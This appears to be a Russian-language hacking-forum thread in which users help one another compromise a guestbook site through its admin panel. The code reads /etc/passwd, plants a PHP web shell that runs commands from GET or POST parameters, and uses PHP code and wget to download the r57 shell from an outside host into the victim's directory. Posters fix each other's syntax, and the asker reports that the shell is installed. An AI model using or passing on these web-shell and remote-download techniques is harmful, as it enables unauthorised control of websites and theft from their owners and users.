Зашел в админку гостевухи
написал

<? if (isset($_GET['do'])) {
readfile("/etc/passwd");
die();
}
?>

в броузере пишу /guest.php?do
ничё не вылазает...
и ещё вопрос, как залить шелл?Вот так чтоль?-

<? system($_POST["cmd"]))

?>

и потом в броузере /guest.php? POST: cmd=[command]
?

иль просто помогите r57 залить. спасиб

1. да он читает файл..

2. мини-шелл))


<PRE>
<?
system($_GET["cmd"]);
?>
</PRE>


или $_POST['cmd'] смотря как передаешь..

З.Ы.

у тя лишняя скобка и нет ;

system($_POST["cmd"])) ;

ну и <PRE></PRE> добавь для нормального отображения

а если вот так:
[PHP]
<?php
$filen="httpL//www.xxx.ru/r57.php";
$file_new="shell.php";
$data = implode("", file($filen));
$fp = fopen($file_new, "w");
fputs($fp, $data);
fclose($fp);
?>
[PHP]
и потом guest/shell.php

/guest.php? POST: cmd=[command]
в таком виде и передавал?

Всё спасиб, я сам разобрался =)

<?
$filen="httpL//www.xxx.ru/r57.php";
$file_new="shell.php";
$data = implode("", file($filen));
$fp = fopen($file_new, "w");
fputs($fp, $data);
fclose($fp);
?>


вот это помогло =)

//хех... ведь могу думать,когда захочу )

Можно проще
<PRE>
<?
system($_GET["cmd"]);
?>
</PRE>

потом http://site.ru/guest.php?cmd=wget http://[адресс шела]
будет загружен в текущую директорию, если права позволяют

/guest.php?cmd=wget www.yoursite.ru/r57shell.php www.hackedsite.ru/shell.php

угу,всё норм, уже всё залил, снач шелл, щас ремвьюв....всё,

топикклоус